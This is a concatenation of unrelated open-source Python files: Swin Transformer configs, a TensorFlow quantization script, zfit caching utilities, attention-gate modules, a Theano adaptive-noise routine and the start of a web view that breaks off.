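#     rois = torch.tensor([[0, 0.0, 0.0, 64.0, 64.0]], device='cuda')  # (batch_idx, x1, y1, x2, y2)
#     feats = torch.randn(1, 7 * 7 * 8, 32, 32, device='cuda')         # output_dim = 8
#     pooled = pool(rois, feats, stride=16)                            # -> (1, 8, 7, 7)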
|
towhee/trainer/models/swin_transformer/configs.py | ThyeeZz/towhee | 365 | 12750196 | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
IMAGENET_DEFAULT_MEAN = [0.485, 0.456, 0.406]
IMAGENET_DEFAULT_STD = [0.229, 0.224, 0.225]
def _cfg(url='', **kwargs):
return {
'url': url,
'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None,
'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,
'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,
'first_conv': 'patch_embed.proj', 'classifier': 'head',
**kwargs
}
model_cfgs = {
# patch models (my experiments)
'swin_base_patch4_window12_384': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22kto1k.pth',
input_size=(3, 384, 384), crop_pct=1.0),
'swin_base_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22kto1k.pth',
),
'swin_large_patch4_window12_384': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22kto1k.pth',
input_size=(3, 384, 384), crop_pct=1.0),
'swin_large_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22kto1k.pth',
),
'swin_small_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_small_patch4_window7_224.pth',
),
'swin_tiny_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth',
),
'swin_base_patch4_window12_384_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth',
input_size=(3, 384, 384), crop_pct=1.0, num_classes=21841),
'swin_base_patch4_window7_224_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22k.pth',
num_classes=21841),
'swin_large_patch4_window12_384_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22k.pth',
input_size=(3, 384, 384), crop_pct=1.0, num_classes=21841),
'swin_large_patch4_window7_224_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth',
num_classes=21841),
}
def build_configs(name, **kwargs):
config = model_cfgs[name]
model_architectures = {
'swin_base_patch4_window12_384' : dict(
patch_size=4, window_size=12, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_base_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_large_patch4_window12_384' : dict(
patch_size=4, window_size=12, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs),
'swin_large_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs),
'swin_small_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=96, depths=(2, 2, 18, 2), num_heads=(3, 6, 12, 24), **kwargs),
'swin_tiny_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=96, depths=(2, 2, 6, 2), num_heads=(3, 6, 12, 24), **kwargs),
'swin_base_patch4_window12_384_in22k' : dict(
patch_size=4, window_size=12, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_base_patch4_window7_224_in22k' : dict(
patch_size=4, window_size=7, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_large_patch4_window12_384_in22k' : dict(
patch_size=4, window_size=12, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs),
'swin_large_patch4_window7_224_in22k' : dict(
patch_size=4, window_size=7, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs)
}
return model_architectures[name], config
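if __name__ == '__main__':
    # Usage sketch: look up an architecture dict and its pretrained-weight config
    # by name; extra kwargs (here num_classes) are forwarded into the architecture dict.
    arch, cfg = build_configs('swin_tiny_patch4_window7_224', num_classes=10)
    print(arch['embed_dim'], arch['depths'])  # 96 (2, 2, 6, 2)
    print(cfg['url'])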
|
examples/tensorflow/nlp/transformer_lt/quantization/ptq/main.py | huggingface/neural-compressor | 172 | 12750199 | #
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import time
import sys
import numpy as np
import unicodedata
import six
import re
import tensorflow as tf
from absl import app
from argparse import ArgumentParser
import pandas as pd
from utils import tokenizer
from utils.tokenizer import Subtokenizer
from utils import metrics
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("batch_size", 64,
"run batch size")
flags.DEFINE_string("input_graph", None,
"The path of input model file.")
flags.DEFINE_string("inputs_file", None,
"File saved to an output file.")
flags.DEFINE_string("reference_file", None,
"File containing reference translation.")
flags.DEFINE_string("vocab_file", None,
"Path to subtoken vocabulary file.")
flags.DEFINE_string("config", None,
"Config json file")
flags.DEFINE_string("output_model", None,
"The output model of the quantized model.")
flags.DEFINE_string("mode", "tune",
"One of three options: 'benchmark'/'accuracy'/'tune'.")
flags.DEFINE_integer("iters", -1,
"The iteration used for benchmark.")
class UnicodeRegex(object):
def __init__(self):
punctuation = self.property_chars("P")
self.nondigit_punct_re = re.compile(r"([^\d])([" + punctuation + r"])")
self.punct_nondigit_re = re.compile(r"([" + punctuation + r"])([^\d])")
self.symbol_re = re.compile("([" + self.property_chars("S") + "])")
def property_chars(self, prefix):
return "".join(six.unichr(x) for x in range(sys.maxunicode)
if unicodedata.category(six.unichr(x)).startswith(prefix))
uregex = UnicodeRegex()
def bleu_tokenize(string):
string = uregex.nondigit_punct_re.sub(r"\1 \2 ", string)
string = uregex.punct_nondigit_re.sub(r" \1 \2", string)
string = uregex.symbol_re.sub(r" \1 ", string)
return string.split()
class bleu(object):
def __init__(self):
self.translations = []
self.labels = []
def reset(self):
self.translations = []
self.labels = []
def update(self, pred, label):
if len(label) != len(pred):
raise ValueError("Reference and translation files have different number "
"of lines. If training only a few steps (100-200), the "
"translation may be empty.")
label = [x.lower() for x in label]
pred = [x.lower() for x in pred]
label = [bleu_tokenize(x) for x in label]
pred = [bleu_tokenize(x) for x in pred]
self.labels.extend(label)
self.translations.extend(pred)
def result(self):
return metrics.compute_bleu(self.labels, self.translations) * 100
def collate_fn(batch):
"""Puts each data field into a pd frame with outer dimension batch size"""
elem = batch[0]
if isinstance(elem, tuple):
batch = zip(*batch)
return [collate_fn(samples) for samples in batch]
elif isinstance(elem, np.ndarray):
return [list(elem) for elem in batch]
elif isinstance(elem, str):
return batch
else:
return pd.DataFrame(batch).fillna(0).values.astype(np.int32)
def load_graph(file_name):
tf.compat.v1.logging.info('Loading graph from: ' + file_name)
with tf.io.gfile.GFile(file_name, "rb") as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(graph_def, name='')
return graph
def eval_func(infer_graph, iteration=-1):
if isinstance(infer_graph, tf.compat.v1.GraphDef):
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(infer_graph, name='')
infer_graph = graph
subtokenizer = Subtokenizer(FLAGS.vocab_file)
input_tensor = infer_graph.get_tensor_by_name('input_tensor:0')
output_tensor = infer_graph.get_tensor_by_name(\
'model/Transformer/strided_slice_19:0')
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
from neural_compressor.data import DATALOADERS
dataloader = DATALOADERS['tensorflow'](ds, batch_size=FLAGS.batch_size,
collate_fn=collate_fn)
config = tf.compat.v1.ConfigProto()
config.use_per_session_threads = 1
config.inter_op_parallelism_threads = 1
sess = tf.compat.v1.Session(graph=infer_graph, config=config)
time_list = []
bleu_eval = bleu()
predictions = []
labels = []
warmup = 10
if iteration != -1:
assert iteration >= warmup, 'iteration must be larger than warmup'
for idx, (input_data, label) in enumerate(dataloader):
if idx < iteration or iteration == -1:
time_start = time.time()
out = sess.run([output_tensor], {input_tensor: input_data})
duration = time.time() - time_start
time_list.append(duration)
predictions.append(out)
labels.extend(label)
else:
break
latency = np.array(time_list[warmup: ]).mean() / FLAGS.batch_size
print('Batch size = {}'.format(FLAGS.batch_size))
print('Latency: {:.3f} ms'.format(latency * 1000))
print('Throughput: {:.3f} items/sec'.format(1./ latency))
# only calculate accuracy when running out all predictions
if iteration == -1:
decode = []
for i,tr in enumerate(predictions):
for j,itr in enumerate(tr):
for k, otr in enumerate(itr):
try:
index = list(otr).index(tokenizer.EOS_ID)
decode.append(subtokenizer.decode(otr[:index]))
except:
decode.append(subtokenizer.decode(otr))
bleu_eval.update(decode, labels)
print('Accuracy is {:.3f}'.format(bleu_eval.result()))
return bleu_eval.result()
class Dataset(object):
def __init__(self, inputs_file, reference_file, vocab_file):
with tf.io.gfile.GFile(inputs_file) as f:
records = f.read().split("\n")
inputs = [record.strip() for record in records]
if not inputs[-1]:
inputs.pop()
self.ref_lines = tokenizer.native_to_unicode(
tf.io.gfile.GFile(reference_file).read()).strip().splitlines()
subtokenizer = Subtokenizer(vocab_file)
self.batch = []
token_lens=[]
for i, line in enumerate(inputs):
enc = subtokenizer.encode(line, add_eos=True)
token_lens.append((i, len(enc)))
sorted_by_token_input_lens = sorted(token_lens, key=lambda x: x[1], reverse=True)
sorted_inputs = [None] * len(sorted_by_token_input_lens)
sorted_keys = [0] * len(sorted_by_token_input_lens)
lines = []
for i, (index, _) in enumerate(sorted_by_token_input_lens):
sorted_inputs[i] = inputs[index]
sorted_keys[index] = i
enc=subtokenizer.encode(sorted_inputs[i], add_eos=True)
lines.append([enc])
for i in sorted_keys:
self.batch.append(lines[i])
def __getitem__(self, index):
data = self.batch[index]
label = self.ref_lines[index]
return data[0], label
def __len__(self):
return len(self.batch)
def main(_):
graph = load_graph(FLAGS.input_graph)
if FLAGS.mode == 'tune':
from neural_compressor.experimental import Quantization, common
quantizer = Quantization(FLAGS.config)
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
quantizer.calib_dataloader = common.DataLoader(ds, collate_fn=collate_fn, \
batch_size=FLAGS.batch_size)
quantizer.model = common.Model(graph)
quantizer.eval_func = eval_func
q_model = quantizer.fit()
try:
q_model.save(FLAGS.output_model)
except Exception as e:
print("Failed to save model due to {}".format(str(e)))
elif FLAGS.mode == 'benchmark':
eval_func(graph, FLAGS.iters)
elif FLAGS.mode == 'accuracy':
eval_func(graph, -1)
if __name__ == "__main__":
tf.compat.v1.app.run()
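# Example invocation (all paths are placeholders; see the flag definitions above):
#   python main.py --input_graph=transformer_lt_fp32.pb --inputs_file=newstest2014.en \
#       --reference_file=newstest2014.de --vocab_file=vocab.txt \
#       --config=transformer_lt.yaml --output_model=transformer_lt_int8.pb --mode=tune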
|
mpf/file_interfaces/__init__.py | Scottacus64/mpf | 163 | 12750203 | """Contains config file interfaces."""
|
zfit/util/cache.py | nsahoo/zfit | 129 | 12750209 | """Module for caching.
The basic concept of caching in Zfit builds on a "cacher", that caches a certain value and that
is dependent of "cache_dependents". By implementing `ZfitCachable`, an object will be able to play both
roles. And most importantly, it has a `_cache` dict, that contains all the cache.
Basic principle
===============
A "cacher" adds any dependents that it may comes across with `add_cache_dependents`. For example,
for a loss this would be all pdfs and data. Since :py:class:`~zfit.Space` is immutable, there is no need to add this
as a dependent. This leads to the "cache_dependent" to register the "cacher" and to remember it.
In case, any "cache_dependent" changes in a way the cache of itself (and any "cacher") is invalid,
which is done in the simplest case by decorating a method with `@invalidates_cache`, the "cache_dependent":
* clears it's own cache with `reset_cache_self` and
* "clears" any "cacher"s cache with `reset_cache(reseter=self)`, telling the "cacher" that it should
reset the cache. This is also where more fine-grained control (depending on which "cache_dependent"
calls `reset_cache`) can be brought into play.
Example with a pdf that caches the normalization:
.. code:: python
class Parameter(Cachable):
def load(new_value): # does not require to build a new graph
# do something
@invalidates_cache
def change_limits(new_limits): # requires to build a new graph (as an example)
# do something
# create param1, param2 from `Parameter`
class MyPDF(Cachable):
def __init__(self, param1, param2):
self.add_cache_dependents([param1, param2])
def cached_func(...):
if self._cache.get('my_name') is None:
result = ... # calculations here
                self._cache['my_name'] = result
else:
result = self._cache['my_name']
return result
"""
# Copyright (c) 2021 zfit
import functools
import weakref
from abc import abstractmethod
from typing import Iterable, Mapping, Union
import numpy as np
import tensorflow as tf
from . import ztyping
from .container import convert_to_container
class ZfitGraphCachable:
@abstractmethod
def register_cacher(self, cacher: "ZfitGraphCachable"):
raise NotImplementedError
@abstractmethod
def add_cache_deps(self, cache_dependents, allow_non_cachable):
"""Add dependents that render the cache invalid if they change.
Args:
cache_dependents:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
if `False`.
"""
pass
@abstractmethod
def reset_cache_self(self):
"""Clear the cache of self and all dependent cachers."""
pass
@abstractmethod
def reset_cache(self, reseter):
pass
class GraphCachable(ZfitGraphCachable):
graph_caching_methods = []
instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
self._cache = {}
self._cachers = weakref.WeakKeyDictionary()
self.reset_cache_self()
self.instances.add(self)
super().__init__(*args, **kwargs)
def __init_subclass__(cls) -> None:
super().__init_subclass__()
graph_caching_methods = []
for func_name in dir(cls):
if not func_name.startswith("__"):
func = getattr(cls, func_name)
if callable(func) and hasattr(func, 'zfit_graph_cache_registered'):
# assert hasattr(func, "_descriptor_cache"), "TensorFlow internals have changed. Need to update cache"
func.zfit_graph_cache_registered = True
graph_caching_methods.append(func)
cls.graph_caching_methods = graph_caching_methods
def register_cacher(self, cacher: ztyping.CacherOrCachersType):
"""Register a `cacher` that caches values produces by this instance; a dependent.
Args:
cacher:
"""
if not isinstance(cacher, ZfitGraphCachable):
raise TypeError(f"`cacher` is not a `ZfitCachable` but {type(cacher)}")
        if cacher not in self._cachers:
self._cachers[cacher] = None # could we have a more useful value?
def add_cache_deps(self, cache_deps: ztyping.CacherOrCachersType, allow_non_cachable: bool = True):
"""Add dependencies that render the cache invalid if they change.
Args:
cache_deps:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
if `False`.
"""
cache_deps = convert_to_container(cache_deps)
for cache_dep in cache_deps:
if isinstance(cache_dep, ZfitGraphCachable):
cache_dep.register_cacher(self)
elif not allow_non_cachable:
raise TypeError("cache_dependent {} is not a `ZfitCachable` but {}".format(cache_dep,
type(cache_dep)))
def reset_cache_self(self):
"""Clear the cache of self and all dependent cachers."""
self._clean_cache()
self._inform_cachers()
def reset_cache(self, reseter: 'ZfitGraphCachable'):
self.reset_cache_self()
def _clean_cache(self):
# for func_holder in self.graph_caching_methods:
# func_holder.reset
self._cache = {}
return
def _inform_cachers(self):
for cacher in self._cachers:
cacher.reset_cache(reseter=self)
def invalidate_graph(func):
@functools.wraps(func)
def wrapped_func(*args, **kwargs):
self = args[0]
if not isinstance(self, ZfitGraphCachable):
raise TypeError("Decorator can only be used in a subclass of `ZfitCachable`")
self.reset_cache(reseter=self)
return func(*args, **kwargs)
return wrapped_func
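# Minimal sketch of how `GraphCachable` and `invalidate_graph` work together
# (mirrors the module docstring; the class below is illustrative, not part of zfit):
#
#     class MyCachedThing(GraphCachable):
#
#         def expensive(self):
#             if 'result' not in self._cache:
#                 self._cache['result'] = ...  # heavy computation
#             return self._cache['result']
#
#         @invalidate_graph
#         def mutate(self, new_value):
#             ...  # changes state; resets this cache and all registered cachers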
class FunctionCacheHolder(GraphCachable):
IS_TENSOR = object()
def __init__(self, func, wrapped_func,
cachables: Union[ZfitGraphCachable, object, Iterable[Union[ZfitGraphCachable, object]]] = None,
cachables_mapping=None):
"""`tf.function` decorated function holder with caching dependencies on inputs.
A `tf.function` creates a new graph for every signature that is encountered. It automatically caches them but
thereby assumes that Python objects are immutable. Any mutation won't be detected. Therefore, an extra wrapper
        is needed. The input signature is compared by first checking whether the function is the same and then
        doing an equality comparison of the arguments (maybe too costly?).
The `FunctionCacheHolder` holds the
- original python function which serves as the hash of the object
- wrapped python function, `wrapped_func`
- the (keyword-)arguments
If any of the keyword arguments changes in a way that the graph cache is invalid, this holder will have
`is_valid` set to False and the `wrapped_func` cannot be used anymore, instead a new `tf.function` should
be created as a call to the `wrapped_func` with the given arguments will result in an outdated graph.
Args:
func: Python function that serves as a hash of the holder. Notice that equality is different
defined.
wrapped_func: Wrapped `func` with `tf.function`. The holder signals via
`is_valid` whether this function is still valid to be used.
cachables: objects that are cached. If they change, the cache is invalidated
cachables_mapping: keyword arguments to the function. If the values change, the cache is
invalidated.
"""
# cache = {} if cache is None else cache
self.delete_from_cache = False
self.wrapped_func = wrapped_func
# self.parent_cache = cache
self.python_func = func
self._hash_value = hash(self.python_func)
if cachables is None and cachables_mapping is None:
raise ValueError("Both `cachables and `cachables_mapping` are None. One needs to be different from None.")
if cachables is None:
cachables = []
if cachables_mapping is None:
cachables_mapping = {}
cachables = convert_to_container(cachables, container=list)
cachables_values = convert_to_container(cachables_mapping.values(), container=list)
cachables_all = cachables + cachables_values
self.immutable_representation = self.create_immutable(cachables, cachables_mapping)
# self._hash_value = hash(self.immutable_representation)
super().__init__() # resets the cache
self.add_cache_deps(cachables_all)
self.is_valid = True # needed to make the cache valid again
def reset_cache_self(self):
self.is_valid = False
def create_immutable(self, args, kwargs):
"""Create a tuple of the args and kwargs by combining them as args + kwargs.keys() + kwargs.values()`
Args:
args: list like
kwargs: dict-like
Returns:
"""
# is initialized before the core
from ..core.interfaces import ZfitData, ZfitParameter, ZfitSpace
args = list(args)
kwargs = list(kwargs.keys()) + list(kwargs.values())
combined = []
if args != []:
combined += args
        if kwargs != []:
            combined += kwargs
combined_cleaned = []
for obj in combined:
if isinstance(obj, ZfitData):
obj = (id(obj),)
elif isinstance(obj, ZfitParameter):
obj = (ZfitParameter, obj.name)
elif isinstance(obj, ZfitSpace):
obj = (id(obj),)
elif tf.is_tensor(obj):
obj = self.IS_TENSOR
elif isinstance(obj, np.ndarray):
obj = (obj,) if sum(obj.shape) < 20 else id(obj)
combined_cleaned.append(obj)
return tuple(combined_cleaned)
def __hash__(self) -> int:
return self._hash_value
def __eq__(self, other: object) -> bool:
if not isinstance(other, FunctionCacheHolder):
return False
# return all(obj1 == obj2 for obj1, obj2 in zip(self.immutable_representation, other.immutable_representation))
array_repr_self = np.array(self.immutable_representation, dtype=object)
array_repr_other = np.array(other.immutable_representation, dtype=object)
try:
return all(np.equal(array_repr_self, array_repr_other))
except ValueError: # broadcasting does not work
return False
except TypeError: # OperatorNotAllowedError inherits from this
return False
# TODO: activate the below? costly, but runs?
# except OperatorNotAllowedInGraphError: # we have to assume they're not the same
# return False
def __repr__(self) -> str:
return f"<FunctionCacheHolder: {self.python_func}, valid={self.is_valid}>"
def clear_graph_cache():
from zfit.z.zextension import FunctionWrapperRegistry
for registry in FunctionWrapperRegistry.registries:
for all_meth in registry.function_cache.values():
for wrapped_meth in all_meth:
wrapped_meth = wrapped_meth.wrapped_func
wrapped_meth._created_variables = None
wrapped_meth._stateful_fn = None
wrapped_meth._stateless_fn = None
wrapped_meth._descriptor_cache.clear()
for registry in FunctionWrapperRegistry.registries:
registry.reset()
for instance in GraphCachable.instances:
instance.reset_cache('global')
# Cachable.graph_caching_methods.clear()
tf.compat.v1.reset_default_graph()
|
models/gates.py | xxxnell/how-do-vits-work | 438 | 12750225 | """
This model is based on the implementation of https://github.com/Jongchan/attention-module.
"""
from functools import partial
import torch
import torch.nn as nn
from einops import reduce, rearrange
import models.layers as layers
class ChannelGate(nn.Module):
def __init__(self, channel, reduction=16, max_pool=True):
super().__init__()
self.pools = []
self.pools.append(nn.AdaptiveAvgPool2d((1, 1)))
self.pools.append(nn.AdaptiveMaxPool2d((1, 1)))
self.pools = self.pools if max_pool else self.pools[:1]
self.ff = nn.Sequential(
layers.dense(channel, channel // reduction, bias=False),
layers.relu(),
layers.dense(channel // reduction, channel, bias=False),
)
self.prob = nn.Sigmoid()
def forward(self, x):
b, c, h, w = x.shape
s = torch.cat([pool(x) for pool in self.pools], dim=-1)
s = rearrange(s, "b c n m -> b (n m) c")
s = self.ff(s)
s = reduce(s, "b n c -> b c", "mean")
s = self.prob(s)
s = s.view(b, c, 1, 1)
return x * s
class SpatialGate(nn.Module):
def __init__(self, kernel_size=7, max_pool=True):
super().__init__()
self.pools = []
self.pools.append(partial(torch.mean, dim=1, keepdim=True))
self.pools.append(lambda x: partial(torch.max, dim=1, keepdim=True)(x)[0])
self.pools = self.pools if max_pool else self.pools[:1]
self.ff = nn.Sequential(
layers.convnxn(len(self.pools), 1, kernel_size=7, stride=1, padding=(kernel_size - 1) // 2),
layers.bn(1)
)
self.prob = nn.Sigmoid()
def forward(self, x):
s = torch.cat([pool(x) for pool in self.pools], dim=1)
s = self.ff(s)
s = self.prob(s)
return x * s
|
lvsr/graph.py | dendisuhubdy/attention-lvcsr | 295 | 12750232 | '''
Functions similar to blocks.graph
'''
import logging
import numpy
import theano
from theano import tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams
from blocks.config import config
from blocks.bricks.base import Brick, application
from picklable_itertools.extras import equizip
from blocks.graph import ComputationGraph
from collections import OrderedDict
logger = logging.getLogger(__name__)
class NoiseBrick(Brick):
"""
    A brick to hold parameters introduced by adaptive noise.
    For each model parameter, adaptive noise adds a learned standard deviation.
    These new parameters will be held by this brick.
Do not use this brick directly! Its main purpose is to hold noise
parameters and to wrap the new cost.
"""
def __init__(self):
super(NoiseBrick, self).__init__(name='adaptive_noise')
self.parameters = []
self.allocated = True
self.initialized = True
@application(inputs=['train_cost', 'model_cost',
'model_prior_mean', 'model_prior_variance'],
outputs=['total_cost'])
def apply(self, application_call, train_cost, model_cost,
model_prior_mean, model_prior_variance):
# We need to add those as auxiliary variables, as they are not
# used to compute the output, and therefore are lost
application_call.add_auxiliary_variable(model_prior_mean.copy(),
name='model_prior_mean')
application_call.add_auxiliary_variable(model_prior_variance.copy(),
name='model_prior_variance')
total_cost = train_cost + model_cost
total_cost.name = 'total_cost'
return total_cost
def __get_name(param):
brick = None
for annotation in param.tag.annotations:
if isinstance(annotation, Brick):
brick = annotation
break
brick_hierarchy = [brick]
while brick_hierarchy[-1].parents:
brick_hierarchy.append(brick_hierarchy[-1].parents[0])
name = "{}.{}".format('/'.join((b.name for b in brick_hierarchy[::-1])),
param.name)
return name
def apply_adaptive_noise(computation_graph,
cost,
variables,
num_examples,
parameters=None,
init_sigma=1e-6,
model_cost_coefficient=1.0,
seed=None,
gradients=None,
):
"""Add adaptive noise to parameters of a model.
Each of the given variables will be replaced by a normal
distribution with learned mean and standard deviation.
A model cost is computed based on the precision of the the distributions
associated with each variable. It is added to the given cost used to
train the model.
See: <NAME> "Practical Variational Inference for Neural Networks",
NIPS 2011
Parameters
----------
computation_graph : instance of :class:`ComputationGraph`
The computation graph.
cost : :class:`~tensor.TensorVariable`
The cost without weight noise. It should be a member of the
computation_graph.
variables : :class:`~tensor.TensorVariable`
Variables to add noise to.
num_examples : int
Number of training examples. The cost of the model is divided by
the number of training examples, please see
<NAME> "Practical Variational Inference for Neural Networks"
for justification
parameters : list of :class:`~tensor.TensorVariable`
parameters of the model, if gradients are given the list will not
be used. Otherwise, it will be used to compute the gradients
init_sigma : float,
initial standard deviation of noise variables
model_cost_coefficient : float,
the weight of the model cost
seed : int, optional
The seed with which
:class:`~theano.sandbox.rng_mrg.MRG_RandomStreams` is initialized,
is set to 1 by default.
gradients : dict, optional
Adaptive weight noise introduces new parameters for which new cost
        and gradients must be computed. Unless the gradients parameter is
given, it will use theano.grad to get the gradients
Returns
-------
cost : :class:`~tensor.TensorVariable`
The new cost
computation_graph : instance of :class:`ComputationGraph`
new graph with added noise.
gradients : dict
a dictionary of gradients for all parameters: the original ones
and the adaptive noise ones
noise_brick : :class:~lvsr.graph.NoiseBrick
the brick that holds all noise parameters and whose .apply method
can be used to find variables added by adaptive noise
"""
if not seed:
seed = config.default_seed
rng = MRG_RandomStreams(seed)
try:
cost_index = computation_graph.outputs.index(cost)
except ValueError:
raise ValueError("cost is not part of the computation_graph")
if gradients is None:
if parameters is None:
raise ValueError("Either gradients or parameters must be given")
logger.info("Taking the cost gradient")
gradients = dict(equizip(parameters,
tensor.grad(cost, parameters)))
else:
if parameters is not None:
logger.warn("Both gradients and parameters given, will ignore"
"parameters")
parameters = gradients.keys()
gradients = OrderedDict(gradients)
log_sigma_scale = 2048.0
P_noisy = variables # We will add noise to these
Beta = [] # will hold means, log_stdev and stdevs
P_with_noise = [] # will hold parames with added noise
# These don't change
P_clean = list(set(parameters).difference(P_noisy))
noise_brick = NoiseBrick()
for p in P_noisy:
p_u = p
p_val = p.get_value(borrow=True)
p_ls2 = theano.shared((numpy.zeros_like(p_val) +
numpy.log(init_sigma) * 2. / log_sigma_scale
).astype(dtype=numpy.float32))
p_ls2.name = __get_name(p_u)
noise_brick.parameters.append(p_ls2)
p_s2 = tensor.exp(p_ls2 * log_sigma_scale)
Beta.append((p_u, p_ls2, p_s2))
p_noisy = p_u + rng.normal(size=p_val.shape) * tensor.sqrt(p_s2)
p_noisy = tensor.patternbroadcast(p_noisy, p.type.broadcastable)
P_with_noise.append(p_noisy)
# compute the prior mean and variation
temp_sum = 0.0
temp_param_count = 0.0
for p_u, unused_p_ls2, unused_p_s2 in Beta:
temp_sum = temp_sum + p_u.sum()
temp_param_count = temp_param_count + p_u.shape.prod()
prior_u = tensor.cast(temp_sum / temp_param_count, 'float32')
temp_sum = 0.0
for p_u, unused_ls2, p_s2 in Beta:
temp_sum = temp_sum + (p_s2).sum() + (((p_u-prior_u)**2).sum())
prior_s2 = tensor.cast(temp_sum/temp_param_count, 'float32')
# convert everything to use the noisy parameters
full_computation_graph = ComputationGraph(computation_graph.outputs +
gradients.values())
full_computation_graph = full_computation_graph.replace(
dict(zip(P_noisy, P_with_noise)))
LC = 0.0 # model cost
for p_u, p_ls2, p_s2 in Beta:
LC = (LC +
0.5 * ((tensor.log(prior_s2) - p_ls2 * log_sigma_scale).sum()) +
1.0 / (2.0 * prior_s2) * (((p_u - prior_u)**2) + p_s2 - prior_s2
).sum()
)
LC = LC / num_examples * model_cost_coefficient
train_cost = noise_brick.apply(
full_computation_graph.outputs[cost_index].copy(), LC,
prior_u, prior_s2)
gradients = OrderedDict(
zip(gradients.keys(),
full_computation_graph.outputs[-len(gradients):]))
#
# Delete the gradients form the computational graph
#
del full_computation_graph.outputs[-len(gradients):]
new_grads = {p: gradients.pop(p) for p in P_clean}
#
# Warning!!!
# This only works for batch size 1 (we want that the sum of squares
# be the square of the sum!
#
diag_hessian_estimate = {p: g**2 for p, g in gradients.iteritems()}
for p_u, p_ls2, p_s2 in Beta:
p_grad = gradients[p_u]
p_u_grad = (model_cost_coefficient * (p_u - prior_u) /
(num_examples*prior_s2) + p_grad)
p_ls2_grad = (numpy.float32(model_cost_coefficient *
0.5 / num_examples * log_sigma_scale) *
(p_s2/prior_s2 - 1.0) +
(0.5*log_sigma_scale) * p_s2 * diag_hessian_estimate[p_u]
)
new_grads[p_u] = p_u_grad
new_grads[p_ls2] = p_ls2_grad
return train_cost, full_computation_graph, new_grads, noise_brick
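# Usage sketch (names are illustrative; `cg` is a ComputationGraph containing `cost`):
#
#     train_cost, cg_noisy, gradients, noise_brick = apply_adaptive_noise(
#         cg, cost, variables=weights, num_examples=50000,
#         parameters=parameters, model_cost_coefficient=0.1)
#
# `train_cost` and `gradients` then replace the original cost and gradients in the
# training algorithm, and `noise_brick.parameters` holds the learned log-variances.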
|
vilya/views/uis/browsefiles.py | mubashshirjamal/code | 1,582 | 12750235 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
from vilya.libs.template import st
from vilya.models.project import CodeDoubanProject
_q_exports = []
class BrowsefilesUI:
_q_exports = ['setting']
def __init__(self, proj_name):
self.proj = proj_name
def _q_access(self, request):
if 'json' in request.environ['HTTP_ACCEPT']:
self.output = 'json'
else:
self.output = 'html'
def _q_index(self, request):
project = CodeDoubanProject.get_by_name(self.proj)
user = request.user
path = request.get_form_var('path', '')
